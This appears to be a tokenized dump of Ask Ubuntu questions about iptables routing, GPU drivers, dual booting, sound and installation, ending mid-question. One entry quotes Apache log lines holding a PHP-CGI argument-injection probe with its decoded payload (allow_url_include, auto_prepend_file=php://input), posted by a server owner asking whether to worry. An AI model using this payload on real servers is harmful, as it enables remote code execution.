408437	help understanding iptables router script and error	hello i have this routing script that i 'm using which runs when all the network interfaces are up : # ! /bin/sh path=/usr/sbin : /sbin : /bin : /usr/bin # # delete all existing rules . # iptables -f iptables -t nat -f iptables -t mangle -f iptables -x # always accept loopback traffic iptables -a input -i lo -j accept # allow established connections , and those not coming from the outside iptables -a input -m state -- state established , related -j accept iptables -a input -m state -- state new -i ! wlan0 -j accept iptables -a forward -i wlan0 -o eth0 -m state -- state established , related -j accept # allow outgoing connections from the lan side . iptables -a forward -i eth0 -o wlan0 -j accept # masquerade . iptables -t nat -a postrouting -o wlan0 -j masquerade # do n't forward from the outside to the inside . iptables -a forward -i wlan0 -o wlan0 -j reject # enable routing . echo 1 > /proc/sys/net/ipv4/ip_forward wlan0 is my wifi connection to my android phones wifi tether , ip range is 192.168.43.0/24 eth0 is my lan connection , ip range : 10.1.1.0/24 i 've noticed when the script gets to this line : iptables -a input -m state -- state new -i ! wlan0 -j accept it comes up with the error : bad argument `wlan0' try `iptables -h ' or 'iptables -- help ' for more information . being a noob with iptables , i 'm not too sure what is wrong . would anyone be able to enlighten me on this ?
408443	how can i install cuda if i have geforce gtx 570 and geforce gt 520	i have geforce gtx 570 and geforce gt 520 , and when i install nvidia drivers 304 , and i enter lspci | grep -i nvidia i could see the 2 gpu , so when i want to install cuda , following this page i reboot , and enter again lspci | grep -i nvidia the geforce gt 520 just dont appear . can anyone explain to me , how can i used the both gpus , thanks in advance
408444	how to configure stereoscopy 3d using bumblebee ?	using a laptop with a geforce gt 650m ( optimus ) with bumblebee using nvidia drivers 304.88 lspci -vnn | grep '\ '' [ 030 [ 02 ] \ ] ' | wc -l 2 i would like to display some stereoscopic video on a external 3d ready projector ( qumi q5 ) i read on http : //ubuntuforums.org that setting this line in xorg.conf under section screen should do the trick . option `` stereo '' `` number between 1 and 6 '' ftp : //download.nvidia.com/xfree86/linux-x86/1.0-8178/readme/appendix-d.html however using bumblebee means i use /etc/x11/bumblebee/xorg.conf.nvidia i think that i need to configure xorg.conf.nvidia by adding a section screen as none exists in it . and what x -configure gives me is a ( generic ? ) xorg.conf with 4 unamed screens . nothing like my actual hardware . plus running optimus -b none nvidia-settings -c :8 show me a sort of vitual screen that does n't match with my screens . what is the best way to configure xorg.conf.nvidia to enable stereoscopic 3d using bumblebee ? thanks for your help .
408445	virtualbox drive error ( kernel driver not installed ( rc=-1908 ) )	so , i am using a thinkpad by lenovo . i have been upgrading it every year , and it runs very good for its model age . i have installed virtualbox on my system . i like crunchbang because of its style . so , what i did with virtualbox is that i made a virtual machine for windows 7 in virtualbox . everytime i start it , the same '' kernel driver not installed ( rc=-1908 ) '' error comes up . i have tried the /etc/init.d/vboxdrv setup command , and nothing works . the terminal refuses it , and says that the command is not a command . i 'm actually trying to use virtualbox to dj with virtual dj . icecasting doesnt work on linux , so that is the reason why i was trying to make a windows 7 virtual machine . please help , i 'm only 14 , and my knowledge of the internet is very big , but my knowledge of errors is really shitty . thank you -ray
408449	how to fix inode/mount-point mime type in xdg ?	i want to associate thunar with folders after uninstalling other file managers and upgrading to 13.10 . however current state confuses me and i am not sure what shoud i fix first ( if anything ) . $ xdg-open . warning : unknown mime-type for `` . '' -- using `` application/octet-stream '' error : no `` view '' mailcap rules found for type `` application/octet-stream '' opening `` . '' with disk usage analyzer ( inode/mount-point ) stuff $ file -- mime-type -b . inode/directory why xdg says unknown mime-type , then picks application/octet-stream but opens `` . '' with disk usage analyzer ( inode/mount-point ) when file says its mime is inode/directory ?
408450	uninstall and reinstall to 13.10	as stated before i 'm a complete novice with ubuntu and now i 'm in a terrible bind . the most efficient and quickest way see to fix nut issue is to delete and reinstall to the latest upgrade . how do i go about doing this ?
408454	unable to install ubuntu 13.10 in new partiton created in windows 7	i created a new 60gb partition in windows7 using its default partition manager . now i 've been trying to install ubuntu 13.10 in this newly created partition . the list of drives displayed by ubuntu during installation does not show this new drive . i 've 4 partitions in windows but ubuntu displays only 2 partitions . any solution .
408455	installing proprietary drivers for r9 290x gpu on ubuntu-gnome	i am at wits end , this is driving me crazy . this question describes my issue perfectly , and yet the solution that worked for that person is n't working for me . like the above linked issue , i have a new computer with an r9 290x , and like them , i could n't install ubuntu until i plugged my monitor into my mobo 's integrated graphics . i was able to install the os fine , at that point . that is n't the issue . however , the installation of the amd drivers does n't seem to be working . i followed the instructions of section 3.1 on this page perfectly , and i do n't get any errors during the installation process . then i go to restart my computer using my fancy new drivers , and my system freezes up during boot , exactly like it did before i started plugging a monitor into integrated graphics . perhaps due to an unrelated issue , i ca n't get grub to come up , so i ca n't even boot into recovery . the only solution i could think of was to completely reinstall ubuntu and try to install catalyst again following the same instructions . same result . i have absolutely no idea how to troubleshoot this issue or get it all working . my workstation is still functional with my windows partition , but i really want to get this working . any help or advice at all would be appreciated . edit : supplemental information that may be relevant : my motherboard 's integrated graphics card is not amd , it 's intel . my monitor is this : http : //www.amazon.com/qnix-qx2710-evolution-led-monitor/dp/b00bui44us - it requires too much ... graphics stuff ( technical term ) for an integrated graphics card to handle . if i try to plug it into my mobo directly it just flashes colors . so i have a different monitor plugged into my integrated graphics card for installation purposes . would either of the above factors somehow screw up the driver installation/configuration process ? if so , what can i do about it ? if not , what the hell is going on ?
408456	nvidia drivers cause blank screen	i installed ubuntu a few days ago , and decided to install steam . after installing steam , i downloaded metro : last light . using the open-source driver , i got a black flash , and the game would close , so i switched to the nvidia 319 ( proprietary , tested ) driver , and i got a black screen when i attempted to launch the game , so i rebooted . now , when i try to boot into ubuntu i get no display output . i 've had something similar gapped before when i installed the nvidia 331 drivers , and i am getting quite annoyed with it . i have a 1440p monitor running over dual-link dvi from my gtx 780 , my processor is a 4770k , i have 16gb of ddr3-1600 c10 ram , and i am using an old 320gb caviar hard drive for my ubuntu drive . i have 64-bit ubuntu 13.11.0-15 installed . any suggestions are appreciated . thank you !
408459	how do i forward a port from one interface to another	i have this script which turns the computer into a router : # ! /bin/sh path=/usr/sbin : /sbin : /bin : /usr/bin # # delete all existing rules . # iptables -f iptables -t nat -f iptables -t mangle -f iptables -x # always accept loopback traffic iptables -a input -i lo -j accept # allow established connections , and those not coming from the outside iptables -a input -m state -- state established , related -j accept iptables -a input -m state -- state new ! -i wlan0 -j accept iptables -a forward -i wlan0 -o eth0 -m state -- state established , related -j accept # allow outgoing connections from the lan side . iptables -a forward -i eth0 -o wlan0 -j accept # masquerade . iptables -t nat -a postrouting -o wlan0 -j masquerade # do n't forward from the outside to the inside . iptables -a forward -i wlan0 -o wlan0 -j reject # enable routing . echo 1 > /proc/sys/net/ipv4/ip_forward i 'm not sure how to forward port 9512 from wlan0 to eth0 10.1.1.30 i 've tried these rules with no success : iptables -a prerouting -t nat -i wlan0 -p tcp -- dport 9512 -j dnat -- to 10.1.1.30:9512 iptables -a input -p tcp -m state -- state new -- dport 9512 -i wlan0 -j accept iptables -a forward -p tcp -i wlan0 -o eth0 -d 10.1.1.30 -- dport 9512 -j accept
408461	can not connect to my wifi	i can not connect to go online using wi-fi . i have a dell vostro and i am new to ubuntu . what drivers do i need ? would it be possible to get step by step instruction ? currently i am connected by wire . thank you in advance
408463	unmet dependencies , i ca n't install ubuntu-sdk	i have been trying to install the ubuntu developer environment so that i may begin gaining practice in app development . but once i try to install ubuntu-sdk i get the following error : the following packages have unmet dependencies : ubuntu-sdk : depends : ubuntu-html5-container but it is not going to be installed for which i then proceed to insert the command : sudo apt-get install ubuntu-html5-container in which i then receive the following error message : the following packages have unmet dependencies : ubuntu-html5-container : depends : qtdeclarative5-ubuntu-ui-extras-browser-plugin but it is not installable at which point i would feel logical to insert the command : sudo apt-get install qtdeclarative5-ubuntu-ui-extras-browser-plugin and my new error message is : package qtdeclarative5-ubuntu-ui-extras-browser-plugin is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source i have no idea what i 'm doing wrong and i have updated my repository libraries several times and still nothing . could someone please tell me what it is that i 'm doing wrong ? why is n't this working like it should ?
408464	apport takes a long time to process errors before display	whenever there 's a problem with a program , apport opens up . this is fine , i like to see the cause when there 's errors . however , the `` loading '' of the parsed bug , which happens after the gif-loading-wheel display , takes a long time . other parts of the system are relatively fast , and parsing a text error should n't take this long . what is wrong ? apport version 2.0.1-0ubuntu17.6 , on ubuntu 12.04 .
408469	dual monitor on virtualbox with 3d acceleration	i 've got ubuntu running in virtualbox with 3d acceleration enabled . it 's working great so far except i ca n't get it to work with dual monitors unless i disable 3d acceleration ( then it becomes too slow to use due to unity ) . any ideas what i could try next ?
408471	strange post requests to my ubuntu server - am i in trouble ?	i have an ubuntu server 12.04 installed on a vm . this server has apache2-mpm-prefork and libapache2-mod-php5 installed . i was looking through the logs and recently came across these rather suspicious entries : xx.xx.xx.xx - - [ 20/jan/2014:09:00:04 +0000 ] `` head / http/1.0 '' 200 274 ... xx.xx.xx.xx - - [ 20/jan/2014:09:00:23 +0000 ] `` post /cgi-bin/php ? % 2d % 64+ ... xx.xx.xx.xx - - [ 20/jan/2014:09:00:25 +0000 ] `` post /cgi-bin/php5 ? % 2d % 64 ... ... decoding the content after php ? ... results in the following : -d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions= '' '' -d open_basedir=none -d auto_prepend_file=php : //input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n is this something i should be concerned about ?
408472	ubuntu 13.10 press s to skip mount or m for manual recovery corrupted fstab ca n't modify	i recently made changes to my fstab file and , upon reboot , noticed i had an error in it . i get the typical mount error on boot . i went to try and modify it by entering the read-only mode but then , since it 's read only , i ca n't access it . is there a way around this or some way to delete the file so i can use the backup ( which i 'm pretty sure works ) ?
408475	curious about the text when booting	so whenever i boot up ubuntu or shut it down , it displays the whole process on black screen with white text , instead of showing only the loading screen of ubuntu . why is that ? it does not look really good..
408478	problem building asmlibrary	i 've got some problem when i try to make the asmlibrary on my 64-bit ubuntu . i 'm new to linux and i do n't know what `` make '' command really does , but it gave me this : g++ -pg -o fit vjfacedetect.o video_camera.o demo_fit.o -l/usr/local/lib -lcv -lcxcore -lhighgui -wl , -rpath=./ -l./ -lasmlibrary /usr/bin/ld : can not find -lcv /usr/bin/ld : can not find -lcxcore /usr/bin/ld : can not find -lhighgui /usr/bin/ld : skipping incompatible .//libasmlibrary.so when searching for -lasmlibrary /usr/bin/ld : can not find -lasmlibrary collect2 : ld returned 1 exit status make : *** [ fit ] error 1 by the way , i just went to the `` linux '' directory and typed `` make '' and i 've done nothing else .
408480	ubuntu and windows 7 ( side by side )	i just would like to know if there is any kind of software that allow me to have ubuntu and windows side by side . im on windows and by clicling on a button , windows suspend and iniciate ubuntu , and the other way as well . if someone can help i would be apreciated
408481	sound problem on 13.10	i have installed windows 8.1 on my asus 1215n . the sound is good and no problem to listening with earphones and without it too . after than i have installed ubuntu 13.10 . on ubuntu everything works well , but when i load windows 8.1 , i have n't any sound with earphones . but the sound works well without inserting earphone in audio jack . same problem was on windows 8.0 too . i thought that it was windows fault , but as it seems it is n't so.. can anybody help me ? has anybody such kind of problem on dual boot system ? thanks..
408482	wubi fails to install lubuntu 12.04	exception : could not retrieve the required installation files that happens everytime wubi is finished installing lubuntu . i know there are questions like this , except i ca n't use a usb big enough for lubuntu , and my pc will not work with cd/dvd drives . the full log is too big to paste , but here 's the last few lines . 01-20 18:07 debug tasklist : # # # finished get_metalink 01-20 18:07 debug tasklist : new task download 01-20 18:07 debug tasklist : # # # running download ... 01-20 18:07 debug btdownloader : downloading http : //cdimage.ubuntu.com/lubuntu/releases/12.04/release/lubuntu-12.04-desktop-i386.iso.torrent > c : \ubuntu\install\lubuntu-12.04-desktop-i386.iso 01-20 18:28 debug tasklist : # # # finished download 01-20 18:28 debug tasklist : new task check_iso 01-20 18:28 debug tasklist : # # # running check_iso ... 01-20 18:28 debug commonbackend : checking c : \ubuntu\install\lubuntu-12.04-desktop-i386.iso 01-20 18:28 debug distro : checking lubuntu iso c : \ubuntu\install\lubuntu-12.04-desktop-i386.iso 01-20 18:28 debug windowsbackend : extracting .disk\info from c : \ubuntu\install\lubuntu-12.04-desktop-i386.iso 01-20 18:28 debug distro : parsing info from str=lubuntu 12.04 `` precise pangolin '' - release i386 ( 20120423 ) 01-20 18:28 debug distro : parsed info= { 'name ' : 'lubuntu ' , 'subversion ' : 'release ' , 'version ' : '12.04 ' , 'build ' : '20120423 ' , 'codename ' : 'precise pangolin ' , 'arch ' : 'i386 ' } 01-20 18:28 debug distro : wrong version : 12.04 ! = 12.04.3 01-20 18:28 debug tasklist : # # # finished check_iso 01-20 18:28 debug tasklist : new task download 01-20 18:28 debug tasklist : # # # running download ... 01-20 18:28 debug downloader : downloading http : //cdimage.ubuntu.com/lubuntu/releases/12.04/release/lubuntu-12.04-desktop-i386.iso > c : \ubuntu\install\lubuntu-12.04-desktop-i386.iso 01-20 18:29 debug downloader : download start filename=c : \ubuntu\install\lubuntu-12.04-desktop-i386.iso , url=http : //cdimage.ubuntu.com/lubuntu/releases/12.04/release/lubuntu-12.04-desktop-i386.iso , basename=lubuntu-12.04-desktop-i386.iso , length=721727488 , text=none 01-20 20:05 debug tasklist : # # # finished download 01-20 20:05 debug downloader : download finished ( read 721727488 bytes ) 01-20 20:05 debug tasklist : new task check_iso 01-20 20:05 debug tasklist : # # # running check_iso ... 01-20 20:05 debug commonbackend : checking c : \ubuntu\install\lubuntu-12.04-desktop-i386.iso 01-20 20:05 debug distro : checking lubuntu iso c : \ubuntu\install\lubuntu-12.04-desktop-i386.iso 01-20 20:05 debug distro : wrong version : 12.04 ! = 12.04.3 01-20 20:05 debug tasklist : # # # finished check_iso 01-20 20:05 error tasklist : could not retrieve the required installation files traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 600 , in get_iso exception : could not retrieve the required installation files 01-20 20:05 debug tasklist : # cancelling tasklist 01-20 20:05 error root : could not retrieve the required installation files traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 132 , in select_task file `` \lib\wubi\application.py '' , line 158 , in run_installer file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 600 , in get_iso exception : could not retrieve the required installation files 01-20 20:05 debug tasklist : # finished tasklist
408491	acer 5950g - subwoofer does n't work	i have an acer 5950g and i use ubuntu 13.10 . my internal subwoofer is dead , it does not work at all . i tried using alsa-tools-gui with no result . i changed and uncommented lines in /etc/pulse/daemon.conf so i put : enable-lfe-remixing = yes default-sample-channels = 3 default-channel-map = ront-left , front-right , lfe i restarted ubuntu and nothing changed . please let me know what i need to do ?
408495	how to get avast ! running on ubuntu 13.10	i know in the current time , anti-virus isnât exactly needed for linux , however i still wish to install some form of protective layer . i had previously downloaded a .deb for the installation of avast ! for linux , but the ubuntu software centre gave me a warning saying the file was of bad origins . iâm at a dead end here . any help is greatly appreciated .
408499	fresh user , fresh pc , fresh ubuntu 12.04 install	i 'm a new ubuntu user , and i could use some pointers and some help with some problems i have stumbled across , but first my configuration : intel core 2 duo 2.41 ghz ; 2 gb ram ddr2 800 mhz ; nvidia 9600 gt 1gb 128 bit ; 3 hdd - 160 gb western digital ; 320 gb western digital ; 1 tb western digital ; asus p5kpl-vm motherboard ; ( it 's a rather old computer i know but this is my desktop ) after having win8 installed and setting up a ubuntu 12.04 lts install i ran into a couple of problems and it resulted in me deleting everything on the harddrives and trying a fresh ubuntu install , and here is where some of my questions appear : 1.how do i setup all the partitions for all the drives , the only pointers i found after alot of searching on the web were for setting up partitions for only 1 hdd , and that did n't work either ... i followed these steps ( http : //athurion.hubpages.com/hub/installing-ubuntu-1204-lts-with-customize-partition ) and after installing and reboot i get a black screen that says `` error : no such partition grub rescue > '' and thats it , i tried installing and running boot repair , but nothing changes , i still get that error and ubuntu does n't boot ( following the steps above i have only partitioned 1 hdd , the 160 gb one , with 4 gb partition for swap area and the rest of the available memory for ext4 partition , for my ubuntu install , the other hard drives remaining intact , seen as free space ) .if someone could help me to a guide on how to partition all my drives and install ubuntu corectly i would be forever grateful . on the first install i have stumbled upon some other problems as follows : 1. my motherboard has a integrated soundcard ( the only one i have available ) realtek ac97 , but after install only my front 2 speakers work ( i have a 5.1 sound system that is connected in my 3 jack ports , rear speakers plugged in the aux jack port , mid/subwoofer plugged in the microphone port ) , i followed another guide that said i should change the alsamixer channels from 2 to 6 ( for 5.1 ) , but i do n't know if this works as my ubuntu crashed beacuse of my next problem . ( any info about this would be very appreciated ) 2.ubuntu asked me to update my nvidia driver ... it gave me a list of possible updates , and being the noob that i am i choose the one that had `` ( recommended ) '' at the end of the line , it asked me for a reboot and after the reboot i got to a screen full of loading commands with one faulty line ( starting load fallback graphics devices [ fail ] ) . these 2 problems can wait a little as for the moment i ca n't run anything on my desktop . i hope i was explicit enough about my problems and if anyone needs any additional info to help me please respond and i will post any info i can gather from the little that i know , and excuse me if i have any grammatical errors , i 'm not a native english speaker and i am still developing my skills , thank you in advance and i sure hope i can fix everything cause i really wan na use and learn more about ubuntu . with respects , isty edit : i installed ubuntu from a usb flash i made and it does n't seem to be any problems with it . ( just in case this info helps )
408501	maimtence shell	not familiar with ubuntu bought a computer with it on it i ran a upgrade from 12:10 to 13.04 it locked up i restarted now i get message a maintenance . shel now startedl control . d just brings back to same page
408502	how to publish my joomla site on local server to the web ?	i am looking to access my joomla site that i have on my ubuntu server from outside my local network . i 'm a new to this world of web publishing . i know how to port forward with ex : no-ip or dyndns if i have the port number . but in this case i do n't have a port number it just goes like this 192.168.x.xxx/joomla/ what would be the best solution ?
408504	samba shares and file permissions	i have a ubuntu system running a samba server . i 'm the only one that can log on locally on the ubuntu computer . i have 1 share ( nas ) and it has 9 directories . all of the directories have permissions of drwxr-xr-x paul : paul except one which is my private directory named paul . the directory paul has permissions of drwxr-x -- - paul : paul . now my question is , do i need to worry that when i create files and directories in paul while using my windows pc that they get created with permissions of drwxr-xr-x ? no one except me can actually enter that directory while browsing with samba because of the local unix permissions set , am i right about that ?
408505	can not get ubuntu to dual boot with windows 8	first off , i want to apologize if this is a duplicate . i feel like i have scoured the internet and the forums here for an answer but none of the suggestions or how to guides are helping . now , onto the problem . my ubuntu cd will not boot , no matter what i do . every time i try to boot from a cd/dvd or usb , windows 8 boots instead . i have already disabled fast start up in my power options ; i have disabled secure boot in my bios ( i even left it enabled to see if that would work ) ; i changed my boot up options in the bios to load either a cd/dvd or usb first ( depending on which one i was using at the time ) ; i used the boot up options menu to select which device i wanted to load from ; i downloaded ubuntu 12.04 64-bit and 13.10 64-bit , created separate cd/dvds of each , and even created a bootable usb device for each one ( i was hoping that one of the cd/dvds or usb sticks would work ) . i re-downloaded and re-created bootable cd/dvds and usb sticks ( after formatting the usb sticks ) , hoping that it was just a download error or image burn error that prevented from the cd/dvds and usbs from not booting . i tried wubi , which will not fully install for whatever reason . i even updated my bios , hoping that would fix some kind of boot up problem . i just ca n't figure out why ubuntu will not load . i managed to get it to install when i changed to legacy mode , but in order to go between the two operating systems , i 'd have to change the bios from uefi to csm or vice versa . am i missing something ? am i doing something wrong ? i 've dual booted windows vista and ubuntu , and windows 7 and ubuntu in the past and it never caused any problems for me . can anyone point me in the right direction ? my laptop is a toshiba satellite s55t-a5277 with intel core i7 , 12 gb ram , and 1 tb hdd ( 100 gb of which is partitioned for ubuntu , if i can ever get it installed ) . i appreciate any and all help i can get . thank you .
408506	how to open a port ?	i have ubuntu 12.04 and i 'm not able to allow certain port in my firewall . so i basically said i will allow everything but it 's still not working . please help . nmap on this machine from other machine says : $ nmap host_name not shown : 996 closed ports port state service 22/tcp open ssh 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds and here is nmap from the same machine $ nmap localhost starting nmap 5.21 ( http : //nmap.org ) at 2014-01-21 11:14 pst nmap scan report for localhost ( 127.0.0.1 ) host is up ( 0.000080s latency ) . not shown : 991 closed ports port state service 22/tcp open ssh 25/tcp open smtp 53/tcp open domain 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds 631/tcp open ipp 3306/tcp open mysql 8000/tcp open http-alt nmap done : 1 ip address ( 1 host up ) scanned in 0.04 seconds i want to open port 8000 and here is the output of iptables . # iptables -l -n chain input ( policy accept ) target prot opt source destination accept all -- 0.0.0.0/0 0.0.0.0/0 chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination accept all -- 0.0.0.0/0 0.0.0.0/0 mmoghimi @ titan : ~ $ sudo netstat -tulpn active internet connections ( only servers ) proto recv-q send-q local address foreign address state pid/program name tcp 0 0 127.0.0.1:3306 0.0.0.0 : * listen 14842/mysqld tcp 0 0 0.0.0.0:139 0.0.0.0 : * listen 982/smbd tcp 0 0 127.0.0.1:39346 0.0.0.0 : * listen 3405/googletalkplug tcp 0 0 127.0.0.1:50995 0.0.0.0 : * listen 3405/googletalkplug tcp 0 0 127.0.0.1:5939 0.0.0.0 : * listen 2412/teamviewerd tcp 0 0 127.0.0.1:53 0.0.0.0 : * listen 2429/dnsmasq tcp 0 0 0.0.0.0:22 0.0.0.0 : * listen 985/sshd tcp 0 0 127.0.0.1:631 0.0.0.0 : * listen 1267/cupsd tcp 0 0 127.0.0.1:25 0.0.0.0 : * listen 1748/exim4 tcp 0 0 0.0.0.0:17500 0.0.0.0 : * listen 2885/dropbox tcp 0 0 0.0.0.0:445 0.0.0.0 : * listen 982/smbd tcp 0 0 127.0.0.1:8000 0.0.0.0 : * listen 4134/python tcp6 0 0 : ::139 : : : * listen 982/smbd tcp6 0 0 : ::80 : : : * listen 1832/apache2 tcp6 0 0 : ::22 : : : * listen 985/sshd tcp6 0 0 : :1:631 : : : * listen 1267/cupsd tcp6 0 0 : :1:25 : : : * listen 1748/exim4 tcp6 0 0 : ::445 : : : * listen 982/smbd udp 0 0 127.0.0.1:53 0.0.0.0 : * 2429/dnsmasq udp 0 0 0.0.0.0:68 0.0.0.0 : * 2403/dhclient udp 0 0 128.54.44.214:123 0.0.0.0 : * 3430/ntpd udp 0 0 myip:123 0.0.0.0 : * 3430/ntpd udp 0 0 127.0.0.1:123 0.0.0.0 : * 3430/ntpd udp 0 0 0.0.0.0:123 0.0.0.0 : * 3430/ntpd udp 0 0 137.110.255.255:137 0.0.0.0 : * 2602/nmbd udp 0 0 myip:137 0.0.0.0 : * 2602/nmbd udp 0 0 128.54.47.255:137 0.0.0.0 : * 2602/nmbd udp 0 0 128.54.44.214:137 0.0.0.0 : * 2602/nmbd udp 0 0 0.0.0.0:137 0.0.0.0 : * 2602/nmbd udp 0 0 137.110.255.255:138 0.0.0.0 : * 2602/nmbd udp 0 0 myip:138 0.0.0.0 : * 2602/nmbd udp 0 0 128.54.47.255:138 0.0.0.0 : * 2602/nmbd udp 0 0 128.54.44.214:138 0.0.0.0 : * 2602/nmbd udp 0 0 0.0.0.0:138 0.0.0.0 : * 2602/nmbd udp 0 0 0.0.0.0:17500 0.0.0.0 : * 2885/dropbox udp 0 0 0.0.0.0:36889 0.0.0.0 : * 1356/avahi-daemon : udp 0 0 0.0.0.0:5353 0.0.0.0 : * 1356/avahi-daemon : udp6 0 0 : :1:123 : : : * 3430/ntpd udp6 0 0 fe80 : :fab1:56ff : fe9:123 : : : * 3430/ntpd udp6 0 0 fe80 : :3e77 : e6ff : fe6:123 : : : * 3430/ntpd udp6 0 0 : ::123 : : : * 3430/ntpd udp6 0 0 : ::33792 : : : * 1356/avahi-daemon : udp6 0 0 : ::5353 : : : * 1356/avahi-daemon :
408508	rtl8188ee does n't detect any wireless signal	i am new to linux , and i finally got 12.04 to dual boot with windows 8 . my problem is that i do not know how to get wireless card to connect . it is not detecting any networks , and i have heard that getting ubuntu to recognize the card is tough with windows 8 . it is a new laptop , and i do not know how to find the wireless card info . i have tried to find additional drivers , but nothing proprietary is showing up . any help would be appreciated on where to go from here . lspci | grep network shows : 02:00.0 network controller : realtek semiconductor co. , ltd. rtl8188ee wireless network adapter ( rev 01 )
408514	ubuntu on macbook air 6,1	i have a 2013 macbook air 11 ' with a haswell i5 and i want to replace os x on it with ubuntu . i do not want to dual boot , as i only have a 128gb ssd . i 've been waiting for a proper guide to do this for a long while now , as i can not risk botching up this macbook and losing access to it . i recently came across this guide : http : //www.sourceprojects.org/installing-ubuntu-13-10-on-a-macbook-air-6-2 however , from what i could tell , that guide is for dual booting with os x , not something i want to do . i am using the specialized mac 64bit iso file for 13.10 from here : http : //ubuntu.excellmedia.net/releases/saucy/ubuntu-13.10-desktop-amd64+mac.iso but i 'm not sure if after i am done installing ubuntu on my macbook , wireless , my webcam , audio , video , the trackpad , the keyboard backlight , sleep , all of that would work oob . has anyone installed ubuntu on their 2013 macbook air successfully ? 13.10 specifically ? did the mac iso work out of the box with everything ? has anyone removed os x completely from their macbook ?
408518	how can you download an app from the software center from a pc without ubuntu to a usb	i 'm having a problem with networking device ( not ubuntu 's fault . ) , so i am using my moms mac to copy an ubuntu app to my usb device . when i try copy the file , the software center gives me a button asking me to install ubuntu to my mom 's mac ! ! ! sadly the answer was a ** no ! ! ! what i mean : wheres the server address for gimp***.deb ? ! ? ! ? ! ? ! ? ! can you trick the site into thinking that you are in ubuntu ? ! ? ? p.s do n't ask me why my networking stuff is broken .
408519	default volume is maximum	i 've been having some issues fixing my audio in ubuntu . everything was working fine until i went into system settings > sound and dragged a slider . that caused all of my audio devices to disappear . after working on fixing that , i 'm now having two issues ( one of which is more major than the other ) : when i log in , the volume is at maximum so the login sound is really loud . this is an issue because when i boot my pc in class , i ca n't have a sound blaring in the room . the little drum beat sound that plays when you arrive at the login screen is n't playing anymore ( system-ready.ogg ) . also , the sound that plays when you adjust your volume settings is n't playing anymore either . if someone could tell me how to resolve these issues , i would love it ! ( i 'm a linux newbie )
408526	installing to a flash drive	i 'm having a tough time getting a handle on this one . background - i 'm deployed , and have one laptop with me running kubuntu 13.10 . i need to do some recording , and would like to use ubuntu studio . i was running a live cd , but then started thinking about installing to a flash drive , so , when i wanted to record , i just boot from the thumb drive and use that . there seems to be some confusion ... when i find articles , many are centered around installing from a flash drive to a hd . i came across a site - and a program called usb installer . it requires you have an iso and a flash drive - and it does the rest . http : //www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/ did that , and when i booted from the drive , it came up with an installer . i 'd like to install to the flash drive - but - wo n't that leave a bunch of install files on the flash drive i do n't need ? am i missing something ? should n't i be running the install from the cd to the flash drive ? ps - i do n't really care about saving anything to the flash drive - i 'd just like it to be 'updateable ' and save settings . thanks in advance..
408527	transmission unable to access internet	it seems none of my bittorrent clients are able to access the internet , including the system default , transmission . i have recently changed my router 's password and firewall settings , and i 'm thinking that may be the cause , but i 'm unsure of how to fix the problem . do i need to have the client use a different port , or can i change its access from my router 's admin page ? any help at all would be greatly appreciated
408532	via s3 unichrome pro igp on ubuntu	can anyone tell me which versions of ubuntu can install via s3 unichrome pro igp correctly with no problems
408533	installation problem with 12.04.3	i had downloaded ubuntu image file file from your website and after downloading when i am trying to install it it takes 2 hrs to download something and once the download is complete it downloads some tar kinda thing and keep on expanding it and never stops ... . my pc configuration is 4gb ram i3 64 bit 500gb hard disk
408534	kernel panic - not syncing : fatal exception in interrupt	just downloaded ubuntu 12.04lts and 13.10 and get the above message when trying to install it . have tried using different media , burning slow etc . pc currently has win 7 home premium on it . 4 gigs ram , using usb keyboard/mouse combo , no other peripherals . any help would be appreciated .
408536	no sound on ubuntu 13.10	so i will be honest , i am rather new to ubuntu and been doing everything possible besides asking for help , so here it is . os : ubuntu 13.10 64 audio device : 00:14.2 audio device : advanced micro devices , inc. [ amd ] fch azalia controller ( rev 01 ) above audio device is recognized but not activated . tried the following : http : //itsfoss.com/fix-sound-ubuntu-1304-quick-tip/ https : //help.ubuntu.com/community/soundtroubleshooting now all my symptoms match the second link , yet when i run the below command i get a `` missing parameters '' error . driver=`lspci -ks slotid | grep `` kernel modules : '' | awk -f : ' { print $ 2 } ' | sed 's/ *//g'` ; modprobe $ driver & & echo `` $ driver '' | sudo tee -a /etc/modules i got to the point where i got no clue what to do anymore and would love any help . edit i am reinstalling ubuntu 13.10 x64 and starting fresh , hardware information and problem will sadly be the same but a purely fresh install . my main problem from here will be sound on 1 program at a time . aka if i am on skype and open a movie , the movie will not play sound till i close both applications and restart the movie . if anyone has a cure for this , i love you to death .
408539	my network printer is printing smiley faces simultaneously !	i am a junior linux administrator at a university . we have installed a xerox phaser 3250 network printer yesterday . we have installed it correctly on desktops with ubuntu 12.04 . it works but it prints many extra pages simultaneously with small smiley faces in the corner of the page . it is a big problem because it does it all the time . we have more of these printers at other places in our university , also linked up with ubuntu 12.04 and they all work correctly . does anybody know how we can fix it ? thank you in advance !
408541	windows boot partition was deleted after re installing ubuntu 13.10 and can not boot into windows	a while ago i tried installing nvidia drivers for ubuntu and ended up completely messing up my system so i left a broken ubuntu on my ssd and used the windows 8 installation on my normal hard drive for a while . yesterday i decided to re-install ubuntu using a bootable usb . i should have chosen the custom option and picked out a specific partition to install ubuntu into since i already had a working dual booting version of grub but i just chose the automatic re-install option for ubuntu . after the re-install i found i could not longer boot into windows 8 . i had experienced this before and was prepared for it but to my surprise , when i booted into the bios there was no option to use the windows boot loader . so i went back into ubuntu and found out that there were only two partitions on my normal hard drive . the normal windows partition and the , also normal , windows recovery partition , but nothing else ( before there had been a windows boot partition ) . my ssd has the correct grub boot , ubuntu , and ubuntu swap partitions , ubuntu works fine and i can still access all my windows files through nautilus or the terminal . i just ca n't boot into windows . i tried the boot repair utility provided by canonical and a few other things but have had no luck . grub started showing a windows 8.1 option after doing a few things and running sudo update-grub but when i select it i get the following : i do not have a windows recovery cd and do not know how to make a windows recovery usb from ubuntu . i am at a loss and do not want to have to re-install windows because the amount of stuff i have on there will take 